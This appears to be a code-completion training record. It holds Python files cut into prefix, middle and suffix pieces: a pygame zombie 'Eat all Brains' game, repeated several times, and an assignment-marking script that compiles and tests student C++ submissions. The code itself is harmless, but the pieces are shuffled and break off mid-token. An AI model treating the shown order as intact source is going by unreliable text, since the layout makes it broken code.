if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def decrease_graphX(self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRectObj = statusTextSurfaceObj.get_rect()
statusTextRectObj.center = (120, screenheight - 20)
#sound init
plopSound = pygame.mixer.Sound('plop.ogg')
#background image
backgroundImage = pygame.image.load('background.png')
score = 0
clock = pygame.time.Clock()
running = True
while running:
clock.tick(30) #30 fps
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == MOUSEBUTTONDOWN:
sprite.target = event.pos # set the sprite.target to the mouse click position
line_points.append(event.pos) # add that point to the line list
if event.type == KEYDOWN:
if event.key == K_SPACE:
sprite.reset_position()
line_points.append([screenwidth / 2, screenheight - 50])
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
hitlist = None
score = 0
if event.key == K_UP:
designator.increase_graphX()
if event.key == K_DOWN:
designator.decrease_graphX()
if event.key == K_RIGHT:
designator.increase_graphY()
if event.key == K_LEFT:
designator.decrease_graphY()
if event.key == K_RETURN:
pos = designator.get_absolute_position()
sprite.target = pos
line_points.append(pos)
if event.key == K_r:
brainSpriteCollection.reset()
if event.key == K_c:
if designatorSelector == 0:
designatorSelector = 1
else:
designatorSelector = 0
#the stuff from the brain connector
screen.blit(background_color, (0,0)) #fill the screen with black colour
screen.blit(backgroundImage, (0,0))
designator.update() # for movement options
brainSpriteCollection.returnList().draw(screen) # the targets to hit
sprite.update() # update the sprite
screen.blit(sprite.image, sprite.rect.topleft) # blit the sprite to the screen
if len(line_points) > 1: # if there are enough points to draw a line
pygame.draw.lines(screen, line_color, False, line_points, 2) # surface, color of lines, uhh, points of lines, width of lines)
#collision detection and high score
hitlist = pygame.sprite.spritecollide(sprite, brainSpriteCollection.returnList(), True)
if len(hitlist) > 0:
score +=len(hitlist)
scoreTextSurfaceObj = fontObj.render('Total Score: ' + str(score), True, (0,0,0), (155,0,0))
print "hit"
thread.start_new_thread(plopSound.play,())
screen.blit(scoreTextSurfaceObj, scoreTextRectObj) # show the score
screen.blit(statusTextSurfaceObj, statusTextRectObj) # show the status
pygame.display.flip()
pygame.quit() # for a smooth quit
if __name__ == "__main__":
main() | ()
Parameters: | random_line_split |
game.py | ###################################################################################
###################################################################################
# efhagame - by Bartholomaeus Dedersen
# based on:
# Sprite Movement Towards Target Example + Physics
# programed/documented by Mad Cloud Games
# contact Mad Cloud Games @ madcloudgames@gmail.com with any comments, questions, or changes
#
# This project is released under the GNU General Public License V3
# This code is open source
# We would love to know what it gets used for
###################################################################################
###################################################################################
import pygame, math, random, thread
from pygame.locals import *
pygame.init()
screenwidth = 800
screenheight = 600
class Vector():
'''
Class:
creates operations to handle vectors such
as direction, position, and speed
'''
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self): # used for printing vectors
return "(%s, %s)"%(self.x, self.y)
def __getitem__(self, key):
if key == 0:
return self.x
elif key == 1:
return self.y
else:
raise IndexError("This "+str(key)+" key is not a vector key!")
def __sub__(self, o): # subtraction
return Vector(self.x - o.x, self.y - o.y)
def length(self): # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center
()
Parameters:
- self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
|
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def decrease_graphX(self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRectObj = statusTextSurfaceObj.get_rect()
statusTextRectObj.center = (120, screenheight - 20)
#sound init
plopSound = pygame.mixer.Sound('plop.ogg')
#background image
backgroundImage = pygame.image.load('background.png')
score = 0
clock = pygame.time.Clock()
running = True
while running:
clock.tick(30) #30 fps
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == MOUSEBUTTONDOWN:
sprite.target = event.pos # set the sprite.target to the mouse click position
line_points.append(event.pos) # add that point to the line list
if event.type == KEYDOWN:
if event.key == K_SPACE:
sprite.reset_position()
line_points.append([screenwidth / 2, screenheight - 50])
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
hitlist = None
score = 0
if event.key == K_UP:
designator.increase_graphX()
if event.key == K_DOWN:
designator.decrease_graphX()
if event.key == K_RIGHT:
designator.increase_graphY()
if event.key == K_LEFT:
designator.decrease_graphY()
if event.key == K_RETURN:
pos = designator.get_absolute_position()
sprite.target = pos
line_points.append(pos)
if event.key == K_r:
brainSpriteCollection.reset()
if event.key == K_c:
if designatorSelector == 0:
designatorSelector = 1
else:
designatorSelector = 0
#the stuff from the brain connector
screen.blit(background_color, (0,0)) #fill the screen with black colour
screen.blit(backgroundImage, (0,0))
designator.update() # for movement options
brainSpriteCollection.returnList().draw(screen) # the targets to hit
sprite.update() # update the sprite
screen.blit(sprite.image, sprite.rect.topleft) # blit the sprite to the screen
if len(line_points) > 1: # if there are enough points to draw a line
pygame.draw.lines(screen, line_color, False, line_points, 2) # surface, color of lines, uhh, points of lines, width of lines)
#collision detection and high score
hitlist = pygame.sprite.spritecollide(sprite, brainSpriteCollection.returnList(), True)
if len(hitlist) > 0:
score +=len(hitlist)
scoreTextSurfaceObj = fontObj.render('Total Score: ' + str(score), True, (0,0,0), (155,0,0))
print "hit"
thread.start_new_thread(plopSound.play,())
screen.blit(scoreTextSurfaceObj, scoreTextRectObj) # show the score
screen.blit(statusTextSurfaceObj, statusTextRectObj) # show the status
pygame.display.flip()
pygame.quit() # for a smooth quit
if __name__ == "__main__":
main()
| self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction | conditional_block |
game.py | ###################################################################################
###################################################################################
# efhagame - by Bartholomaeus Dedersen
# based on:
# Sprite Movement Towards Target Example + Physics
# programed/documented by Mad Cloud Games
# contact Mad Cloud Games @ madcloudgames@gmail.com with any comments, questions, or changes
#
# This project is released under the GNU General Public License V3
# This code is open source
# We would love to know what it gets used for
###################################################################################
###################################################################################
import pygame, math, random, thread
from pygame.locals import *
pygame.init()
screenwidth = 800
screenheight = 600
class Vector():
'''
Class:
creates operations to handle vectors such
as direction, position, and speed
'''
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self): # used for printing vectors
return "(%s, %s)"%(self.x, self.y)
def __getitem__(self, key):
if key == 0:
return self.x
elif key == 1:
return self.y
else:
raise IndexError("This "+str(key)+" key is not a vector key!")
def __sub__(self, o): # subtraction
return Vector(self.x - o.x, self.y - o.y)
def length(self): # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
|
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center
()
Parameters:
- self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def decrease_graphX(self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRectObj = statusTextSurfaceObj.get_rect()
statusTextRectObj.center = (120, screenheight - 20)
#sound init
plopSound = pygame.mixer.Sound('plop.ogg')
#background image
backgroundImage = pygame.image.load('background.png')
score = 0
clock = pygame.time.Clock()
running = True
while running:
clock.tick(30) #30 fps
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == MOUSEBUTTONDOWN:
sprite.target = event.pos # set the sprite.target to the mouse click position
line_points.append(event.pos) # add that point to the line list
if event.type == KEYDOWN:
if event.key == K_SPACE:
sprite.reset_position()
line_points.append([screenwidth / 2, screenheight - 50])
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
hitlist = None
score = 0
if event.key == K_UP:
designator.increase_graphX()
if event.key == K_DOWN:
designator.decrease_graphX()
if event.key == K_RIGHT:
designator.increase_graphY()
if event.key == K_LEFT:
designator.decrease_graphY()
if event.key == K_RETURN:
pos = designator.get_absolute_position()
sprite.target = pos
line_points.append(pos)
if event.key == K_r:
brainSpriteCollection.reset()
if event.key == K_c:
if designatorSelector == 0:
designatorSelector = 1
else:
designatorSelector = 0
#the stuff from the brain connector
screen.blit(background_color, (0,0)) #fill the screen with black colour
screen.blit(backgroundImage, (0,0))
designator.update() # for movement options
brainSpriteCollection.returnList().draw(screen) # the targets to hit
sprite.update() # update the sprite
screen.blit(sprite.image, sprite.rect.topleft) # blit the sprite to the screen
if len(line_points) > 1: # if there are enough points to draw a line
pygame.draw.lines(screen, line_color, False, line_points, 2) # surface, color of lines, uhh, points of lines, width of lines)
#collision detection and high score
hitlist = pygame.sprite.spritecollide(sprite, brainSpriteCollection.returnList(), True)
if len(hitlist) > 0:
score +=len(hitlist)
scoreTextSurfaceObj = fontObj.render('Total Score: ' + str(score), True, (0,0,0), (155,0,0))
print "hit"
thread.start_new_thread(plopSound.play,())
screen.blit(scoreTextSurfaceObj, scoreTextRectObj) # show the score
screen.blit(statusTextSurfaceObj, statusTextRectObj) # show the status
pygame.display.flip()
pygame.quit() # for a smooth quit
if __name__ == "__main__":
main()
| l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None | identifier_body |
mark.py | #!/bin/env python3
# Evan Wilde (c) 2017
# My big insane marking script of doom 😈
import argparse
import os
import sys
import csv
import re
import shutil
import subprocess
from subprocess import call
username_pattern = r".*\((.*)\)$"
username_expr = re.compile(username_pattern)
test_pattern = r"(100|[1-9][0-9]|[0-9])% tests passed, ([0-9]+) tests failed out of ([0-9]+)"
test_expr = re.compile(test_pattern)
## Helper Functions
# Deletes files in folder, it ignores filenames in ignore list
def removeFiles(folder, ignore=[], skipdirs=True):
"Deletes all files that are in folder"
for f in os.listdir(folder):
if f in ignore:
continue
try:
fpath = os.path.join(folder, f)
if os.path.isfile(fpath):
os.remove(fpath)
elif os.path.isdir(fpath) and not skipdirs:
shutil.rmtree(fpath)
except Exception as e:
print(f"Threw an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if | ef appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def getFiles(dirc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"]))
elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) )
elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
:returns: score
"""
test_ret = subprocess.run(["make", "test"], encoding='utf-8',
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = test_ret.stdout
errors = test_ret.stderr
lines = output.split('\n')
# find the line with the info we are looking for
i = 0
for idx, l in enumerate(lines):
if "% tests passed," in l:
i = idx
m = test_expr.search(lines[i])
if m:
perc, wrong, total = m.groups()
perc = float(perc) / 100 # percent
wrong = int(wrong)
